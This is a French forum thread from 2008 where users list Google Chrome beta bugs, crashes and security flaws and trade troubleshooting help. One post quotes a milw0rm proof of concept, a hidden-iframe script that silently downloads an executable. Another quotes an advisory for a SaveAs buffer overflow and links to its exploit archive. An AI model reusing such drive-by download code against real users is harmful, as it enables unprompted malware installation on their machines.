Liste des bugs, erreurs et failles Google Chrome beta

[carole heinz]

Suite à la sortie du navigateur Google Chrome version beta , il pourrait être intéressant de lister ici les différents bugs et failles que chacun rencontre (ou pense rencontrer) avec ce tout nouveau navigateur.

déjà repérés (mais pas tous avérés, attention ) :



Vie privée

- installation d'un supercookie (tracker) insensible à la suppression traditionnelle des cookies [procédure de suppression] (à réitérer après chaque mise à jour)


Failles (sécurité)

- exploit 8 Remote Silent Crash PoC
- exploit 7 Save As remote BOF exploit
- exploit 6 a href denial of service (DOS)
- exploit 5 Inspect Element DOS exploit
- exploit 4 Carriage Return Null Object Memory Exhaustion Remote Dos
- exploit 3 Window Object Suppressing Remote Denial of Service
- exploit milw0rm 2: l'enregistrement d'une page contenant une balise <title> trop longue rend possible l'exécution de code malicieux
- exploit milw0rm 1: download d'executables (.exe) sans autorisation
- il est possible de charger n'importe quelle DLL dans le process de Chrome avec un simple shellexecute.



Bugs (affichage, fonctionnalités...)

- tapez "about:%" dans la barre adresse/recherche -> plantage
- crash de l'onglet affichant un pdf (quand on scrolle verticalement dans le pdf)
- crash complet sur lien formé d'un identifieur inconnu suivi d'un caractère spécial
- connexion impossible Microsoft AdCenter
- calcul d'itinéraire ViaMichelin HS
- pb affichage Facebook (lien "commenter")
- pb affichage GMail (écrasement de certaines colonnes)
- ne lit pas les applications Microsoft Silverlight
- pas d'icône orange RSS dans la barre d'adresse/recherche
- le crash d'un onglet cause quand même le blocage des autres onglets dans certains cas
- bugs avec certains scripts javascripts
- pas de reconnaissance JAVA
- des problèmes de scroll avec molette souris / touchpad
- gestion du multi-screen problématique (scroll)
- problème d'affichage de la liste des mots de passe
- pas d'affichage du PR lol
- trojan repéré par certains AV lors de l'installation
- impossibilité de mettre un site 2 fois en favoris (dans des dossiers différents)
- correcteur orthographique parfois fantaisiste
- certains caractères deviennent invisibles lors de la saisie
- blocage de sites utilisant la régie cibleclick
- gestion de certains paniers ecommerce (impossible d'ajouter au panier)
- gestion des width/height en %
- certaines checkboxes
- affichage des flux RSS
- gestion des position: absolute

Voir aussi : faire la mise à jour de Chrome

 

[moktoipas]

"blocage de sites utilisant la régie cibleclick"

est-ce un bug :twisted: :twisted:

pour ma part, j'en ai pas trouvé du bugs ><
et mes checkboxes n'ont rien de spécial

 

[mythos75]

Correcteur orthographique toujours fantaisiste
La saisie de texte est vraiment pénible...

 

[Madrileño]

Certains antivirus avertissent lors de l'installation qu'il y a un trojan (vu sur les autres posts et sur les blogs).

 

[mythos75]

Dans les options, la liste des mots de passe : je ne peux pas faire "afficher le mot de passe". Peut-être parce que normalement j'ai un mdp général qui protège mes mdps ? Dans firefox je dois saisir ce dernier pour voir la liste de mes mdps enregistrés.

 

[5_legs]

Dans les options, la liste des mots de passe : je ne peux pas faire "afficher le mot de passe". Peut-être parce que normalement j'ai un mdp général qui protège mes mdps ? Dans firefox je dois saisir ce dernier pour voir la liste de mes mdps enregistrés.

ça ne semble pas être un bug, chez moi ça fonctionne, la différence c'est l'affichage du mot de passe à l'unité (contre la totalité pour FF)

 

[moktoipas]

au moins deux personnes ne peuvent scroller vers le haut

http://www.scoopeo.com/scoop/show/203155/#208137

 

[mythos75]

Dans les options, la liste des mots de passe : je ne peux pas faire "afficher le mot de passe". Peut-être parce que normalement j'ai un mdp général qui protège mes mdps ? Dans firefox je dois saisir ce dernier pour voir la liste de mes mdps enregistrés.

ça ne semble pas être un bug, chez moi ça fonctionne, la différence c'est l'affichage du mot de passe à l'unité (contre la totalité pour FF)

Moi ça n'affiche rien du tout Le txt du bouton change mais rien n'apparaît, je suppose que normalement une nouvelle colonne est créée, pas chez moi.

 

[carole heinz]

merci pour ces infos (je mets la liste à jour sur le premier message)

 

[Al-Kanz]

hier soir, impossible de faire apparaître le calendrier sous Google Analytics.

 

[L.Jee]

Analytics à eu quelques soucis chez moi aussi mais même sur firefox.

 

[TheKind]

au moins deux personnes ne peuvent scroller vers le haut

http://www.scoopeo.com/scoop/show/203155/#208137

Je confirme ce bug. Je suis sur un Dell 1520, Vista Edition Familiale Basique, le scroll vers le bas avec le touchpad marche impécablement, vers le haut ça bouge pas.
Par contre si je branche une souris, ça scrolle...

 

[easydoor]

pour la liste des bugs

Impossible d'ouvrir le lien " Commenter" dans facebook (125 millions d'abonnés)

l'affichage écran dérape certaines fois, cad il découpe et glisse des lignes vers la droite, le haut des mots n'est plus aligné avec le bas.

bizarre chez google un produit aussi mal fini. respecte t-il les protocoles

le dictionnaire signale une faute dans Google et google

je crois que je vais pas me prendre la tête avec chrome, j'y reviendrai plus tard .

 

[moktoipas]

easydoor >> C'est une BETA

 

[easydoor]

difficultés d'affichage dans Gmail, il y a des colonnes qui s'écrasent entre elles.

pour moi je ne lis pas le nombre en fin de ligne boite de réception .

c'est une béta, c'est un béta.

pardon, mais entre béta et qualité de travail, google nous a montré dés béta mieux que cela avec des testeurs ou des invitations.

gros coup de pub, pour moi gros flop ou bonne stratégie pour exciter leurs concurrents et les pousser à évoluer .

 

[moktoipas]

non mais je veux dire, c'est une VRAI beta, pas comme les autre beta de google (comme celle de gmail).

 

[metropoway]

pardon, mais entre béta et qualité de travail, google nous a montré des béta mieux que cela

Entièrement d'accord.
C'est effectivement assez surprenant cette sortie pour le moins minimaliste à tout point de vue. Surtout peu de temps après la sortie en fanfare de la v.3 de FF.
Cela se rapproche plus d'une version alpha que d'une version beta.

gros coup de pub, pour moi gros flop ou bonne stratégie pour exciter leurs concurrents et les pousser à évoluer

On peut se poser la question effectivement.
Je pense qu'on ne tardera pas à le savoir.

 

[moktoipas]

en ingenierie logiciel:
version alpha=toute les fonctions ne sont pas la et celle qui sont la ont des bugs.
version beta=toutes les fonctions sont la et ont des bugs.

cette sortie est tout sauf minimaliste...toute la technosphere ne parle que de ca depuis lundi !

 

[metropoway]

toute la technosphere ne parle que de ca depuis lundi !

Je ne savais pas que le niveau de 'bruit' fait autour de quelque chose était gage de qualité.
En tout ca, ça veut dire qu'il y a au moins une chose non minimaliste dans cette sortie : la comm :wink:

version alpha=toute les fonctions ne sont pas la et celle qui sont la ont des bugs.
version beta=toutes les fonctions sont la et ont des bugs.

C'est bien ce que je dis.
Que cela ne soit plus une alpha... peut-être ?
Mais j'ai du mal à imaginer qu'il puisse s'agir d'une vrai beta.

 

[carole heinz]

cette sortie est tout sauf minimaliste...toute la technosphere ne parle que de ca depuis lundi !

oui ça c'est juste parce les bloggeurs et autres geeks ne prennent pas conscience qu'ils font un travail gigantesque de com', et gratuitement en +

google lance un powerpoint avec un sosie d'Elton John au micro et le monde entier le relaye: plus fort que les travailleurs pauvres, les travailleurs bénévoles de Google. tout ça pour récupérer quelques clics à $0.02

la course au scoop et à l'audience corrompent complètement l'esprit critique de certains. résultat tout le monde est manipulé: on creuse notre propre tombe, et avec le sourire, en plus.

 

[easydoor]

j'aime bien vos réflexions carole et metropoway

par contre maintenant je suis passé en mode travail et chiffre d'affaire

 

[moktoipas]

C'est le premier produit que je vois pour lequel google a fait un visioconference.

Sinon c'est toujours plus une "vraie" beta qu'ie8 b1 ou safari pour win b1...

 

[Sullyvan]

bonjour,

j'ai un peu testé Chrome et deux bugs ont fait surface:

1- impossible de lancer une page de navigation privée, ça ouvre la page avec l'icône 'incognito' et elle se ferme aussi tôt

2- c'est pas un bug mais un manque ou juste moi qui ai mal cherché, il n'y a pas de gestion de la mise en page des impressions, ni même d'aperçu avant impression


Sinon ma première impression est plutôt bonne, il est rapide (au lancement surement), le rendu des sites est bon, il semble plus léger que ses concurrents. reste à voir avec le temps..


Edit: après un plantage lors de la duplication d'un onglet, et un re-lancage de Chrome,le mode incognito fonctionne bien..

 

[passion]

Bug de session... impossible de passer les arguments en session

 

[Sullyvan]

Bug de session... impossible de passer les arguments en session

c'est à dire ?

 

[NoGlob]

cette sortie est tout sauf minimaliste...toute la technosphere ne parle que de ca depuis lundi !

oui ça c'est juste parce les bloggeurs et autres geeks ne prennent pas conscience qu'ils font un travail gigantesque de com', et gratuitement en +

google lance un powerpoint avec un sosie d'Elton John au micro et le monde entier le relaye: plus fort que les travailleurs pauvres, les travailleurs bénévoles de Google. tout ça pour récupérer quelques clics à $0.02

la course au scoop et à l'audience corrompent complètement l'esprit critique de certains. résultat tout le monde est manipulé: on creuse notre propre tombe, et avec le sourire, en plus.

+1000 !

Le monopole de Microsoft est frainé par l'opinion publique c'est une bonne chose, par contre celle de Google est accélérer de façon très efficace par cette même opinion publique. C'est très dangereux surtout que Google concurrence (écrase) les sites Web en sortant des machines de guerre dans chaque marché à fort potentiel.

 

[plopz0r]

Impossible de se connecter à la régie de liens sponsorisés Microsoft Adcenter... Pur hasard ? :roll:

 

[YO64]

Je ne sais pas si il s'agit d'un bug mais je ne peux afficher aucune pasge web avec Chrome.
Il y a un message "aie aie aie, etc.." et il me demande de rafraichir ou de changer de page.Acune solution ne marche.Je suis le seul??

 

[WebRankInfo]

en tout cas on voit arriver les failles de sécurité de Google Chrome...

 

[Thierry Bugs]

en tout cas on voit arriver les failles de sécurité de Google Chrome...

en même temps c'était inévitable :wink:

Mais peut etre que c'est sur le sujet de la sécurité
que la guerre des navigateurs va se jouer à l'avenir
et Chrome a des atouts certains (base google des sites dangereux, spam report, phishing...)

 

[carole heinz]

OK je viens d'éditer le titre + le post de départ

 

[Jeviensderio]

Re: Liste des bugs et erreurs Google Chrome beta

- ne lit pas les applications Microsoft Silverlight

Il s'agit d'un plugin externe, Opera ne le supporte pas non plus, il faudrait que Microsoft fasse une version pour Chrome. On s'attend à ce qu'ils trainent un peu les pieds.

Il faut voir Chrome avant tout comme un navigateur fait pour les applications Web (à mon avis c'est le but), sur ce plan il est parfait.

 

[Greendragon]

Chrome ne gère pas les doubles écrans : quand je le met en plein écran à droite, ça me le met avec la bonne dimension pour mon écran de gauche.

 

[YO64]

Personne ne sait comment éviter ça ??

 

[carole heinz]

un premier "exploit" qui fait crasher chrome ici (à visiter avec Chrome bien sûr! )

-http://evilfingers.com/advisory/google_chrome_poc.php?tag=mncol;txt (je décline toute responsabilité)

ce qui le crashe à priori c'est un simple lien formé d'un identifieur inconnu suivi d'un caractère spécial

 

[carole heinz]

un autre bug JAVA ici:
-http://raffon.net/research/google/chrome/carpet.html (je décline toute responsabilité)

 

[pillets]

Personne ne sait comment éviter ça ??

Tu n'es pas le seul moi aussi j'ai la même chose et je ne sais pas comment faire pour naviguer.

J'ai essayé sur un autre pc et là ça marche. Donc peut etre que le problème vient, du pc mais de quoi exactement ....

 

[Madrileño]

Vérifiez le pare-feu que vous avez s'il laisse le logiciel naviguer.

 

[YO64]

Vérifiez le pare-feu que vous avez s'il laisse le logiciel naviguer.

Pare feu windows et pare feu de la Neuf Box désactivés, ça ne change rien. :cry:

 

[pillets]

Vérifiez le pare-feu que vous avez s'il laisse le logiciel naviguer.

Pare feu windows et pare feu de la Neuf Box désactivés, ça ne change rien. :cry:

itou pare-feu desactivé et toujours la même chose.

 

[Madrileño]

Même FAI ?
Quel OS ?
Peu peut-être apporter des réponses.

 

[carole heinz]

crash d'un onglet affichant un pdf et sur lequel on scrolle verticalement. après 5 min de blocage complet, j'arrive à fermer l'onglet bloqué mais une boîte apparaît:

L'instruction à "0x0700609c" emploi l'adresse mémoire "0x00000014". La mémoire ne peut être "read". Cliquez sur OK pour terminer le programme.

 

[pillets]

Même FAI ?
Quel OS ?
Peu peut-être apporter des réponses.

Non suis chez free - pc windows xp qui fonctionne bien avec ie-FF et opera depuis longtemps.

 

[Madrileño]

Avez-vous tester Safari aussi (Google utilisant en partie cette technologie) ?

 

[Marie-Aude]

Problème "inhérent" à la logique de Chrome : une page avec des scripts, dont Lightbox.
"Avant" les vignettes des photos n'aparaissaient pas avant que les scripts soient chargés, donc on pouvait cliquer et démarrer l'appli tout de suite, avec les zolis zeffets.
Maintenant, les vignettes sont chargées bien avant les scripts... kaka pas bô

 

[Madrileño]

Ce problème est aussi sur FireFox et peut-être d'autres navigateurs, il suffit que le script soit un peu long au chargement (par exemple le serveur un peu lent).

 

[carole heinz]

encore une petite erreur, je ne sais pas si elle a déjà été soulignée ici:

La Belgique a été annexée à l'Allemagne

clin d'oeil à l'actualité de la Belgique? Vengeance suite à la condamnation de Google en Belgique? erreur?

 

[RiPSO]

quand ils auront envoyé leur satellite pour améliorer google earth ils auront peut être une carte à jour :lol:

 

[YO64]

Même FAI ?
Quel OS ?
Peu peut-être apporter des réponses.

Neufbox avec windows xp sp 3.

 

[carole heinz]

exploit milworm:

***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

http://www.milw0rm.com/exploits/6355

 

[mamy domdom]

Google Chrome beta

bonjour
je l'ai installé hier,et rien de rien,si je fais une recherche,ça se bloque,et j'ai un message:
aïe,aïe,aïe,google chrome s'est bloqué,relancer ok,annuler,donc je le désinstalle pour le moment car pas le temps pour des tests
merci à vous si vous pensez que je l'ai mal installé
mamy domdom

 

[WebRankInfo]

en effet Carole, j'avais d'ailleurs signalé cette faille dans les commentaires sur https://www.webrankinfo.com/actualites/2 ... chrome.htm

 

[hipopulation]

Je ne sais pas si ça a déjà été vu mais taper :

about:%

dans la barre d'adresse.......

 

[Cendrillon]

Je ne sais pas si ça a déjà été vu mais taper :

about:%

dans la barre d'adresse.......

Pas vraiment sympa le résultat ... :evil:

 

[RiPSO]

Je ne sais pas si ça a déjà été vu mais taper :

about:%

dans la barre d'adresse.......

Pas vraiment sympa le résultat ... :evil:

Aïe aïe aïe! :lol:

 

[papyjo78]

cliques droit

pas moyen de faire un clic droit sans erreur serieuse de microsoft !

 

[Cendrillon]

Allons, allons ... ce n'est pas parce que c'est Microsoft (éditeur du système d'exploitation) qui remonte les erreurs et affiche les messages de plantage qu'il en est à l'origine et/ou responsable ... :lol:

 

[h4ni]

une autre faille signaler sur millw0rm

Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit

 

[carole heinz]

en effet:

PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.

Here is Description for this Vuln :
·          Type of Issue : Buffer Overflow. 
·          Affected Software : Google Chrome 0.2.149.27.      
·          Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
·          Impact: Remote code execution.
·          Rating : Critical .
·          Description :
The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving 
a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes 
it possible for attackers to execute arbitrary code on users’ systems.
·          How an attacker could exploit the issue :
To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. 
He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would 
be executed, giving him the privilege to make use of the affected system.
·          Discoverer : Le Duc Anh - SVRT - Bkis
·          About SVRT :
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes 
in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols 
and embedded systems…
·          Website : security.bkis.vn
·          Mail : svrt[at]bkav.com.vn

http://milw0rm.com/sploits/2008-chrome.tgz

# milw0rm.com [2008-09-05]

http://www.milw0rm.com/exploits/6367

 

[Scrat]

Moi je n'arrive pas à acceder à un site qui nécessite un certificat.

J'ai importer le certificat et celui-ci n'est pas reconnu alors que le même certificat ne pose aucun soucis sous FF et IE.
Pour infos, une personne sur un autre forum a exactement le même soucis

 

[Jeviensderio]

Un petit correctif, Chrome exécute bien les applications Silverlight (on peut le vérifier sur le tutoriel Silverlight).

Le nom du plugin est WPF/E, l'ancien nom de code.

Mais on peut ajouter aux défauts le fait qu'il n'affiche pas un fichier local d'extension .php (pas de problème sur un site web).

 

[Madrileño]

Mise à jour disponible : 0.2.149.29
[Récapitulatif] Google Chrome.

 

[david96]

Une faille critique corrigée dans Google Chrome
D'après PC World, Technaute.ca

Une firme de sécurité vietnamienne a détecté une faille critique dans le nouveau fureteur de Google, qui a déjà publié le correctif nécessaire.

La vulnérabilité - un débordement de mémoire tampon (buffer overflow) - se produit lorsqu'un utilisateur sauvegarde une page web contenant une balise titre trop longue.Le fureteur peut avoir de la difficulté à enregistrer la page en question et un pirate informatique pourrait prendre le contrôle de l'ordinateur et exécuter du code sur la machine.

Ce problème peut affecter les ordinateurs roulant sous Windows XP SP2 et munis de la version 0.2.149.27 de Google Chrome.

Détail et source de l'article : technaute.cyberpresse.ca

 

[Cendrillon]

Je ne sais pas si c'est vraiment un bug, mais en tout cas c'est à mon avis ennuyeux : lorsque l'on click sur un lien du type : <a href="#" OnClick="fonction javascript"> (par exemple)... le titre de la page est remplacé par "sans titre" ...

 

[carole heinz]

mise à jour du post n°1 pour:

- installation d'un supercookie (tracker) insensible à la suppression traditionnelle des cookies [procédure de suppression] (à réitérer après chaque mise à jour)

 

[carole heinz]

il est d'ailleurs temps de mettre aussi les failles et exploits à jour

- Remote Silent Crash PoC
- Save As remote BOF exploit
- a href denial of service (DOS)
- Inspect Element DOS exploit
- Carriage Return Null Object Memory Exhaustion Remote Dos
- Window Object Suppressing Remote Denial of Service

 

[hysteria]

Bonjour/bonsoir !

Que j'explique mon soucis. Google Chrome à toujours été mon navigateur par défaut depuis qu'il est sorti. Je l'ai utilisé sous XP et Vista. Dernièrement j'ai du formater mon pc, changer des pièces fin bref. Je suis repartie à zéro. Seulement depuis google Chrome ne réagit plus de la même manière. Lorsque je suis sur msn et que l'un de mes contactes m'envois un lien, celui-ci ne s'ouvre pas. Chrome est mon navigateur par défaut. Lorsque c'est une vidéo/chanson je l'entend, j'ai beau cliqué rien ne s'ouvre, seulement les bruits continuent. Et merci lorsque ceux-ci sont en boucle pour les oreilles... J'ai tenté de desinstaller/ reinstaller, idem. J'ai changé de navigateur par défaut et là les liens s'ouvrent. C'est génant car chrome est le navigateur que je préfère et je ne comprend pas d'ou vient ce bug.

J'espère que vous avez une solution. Merci d'avance.

 

[fluo]

Bonjour,

J'ai un problème très gênant sur Chrome.

Certaines pages de mon site sont rafraichies en navigation mais pas dans les sources ni dans les liens.

Je m'explique :

- J'ai 2 pages qui se ressemblent (beaucoup)
- Elles contiennent des formes multiples, des liens get et post.
- Je fais des manips diverses (cliques, retours) multiples.
- Je suis sur la page A.
- Je fais "Afficher le source", la page B s'affiche !
- Je clique sur un lien, tout explose (perte des variables post)

Si qq a une idée !!!

 

[manuer]

Bonsoir,

sur l'un de mes sites, le menu déroulant (javascript) à gauche ne fonctionne pas ni les sous-menus et surtout ne s'affiche pas du tout (plus que gênant pour les visiteurs) alors que sous google ou mozilla firefox ou IE8, tout va bien

Dois-je revoir tout le process menu et le changer ou pouvez-vous m'aider ? Merci de me répondre car il faut que je réagisse très vite

Cordialement, Emmanuel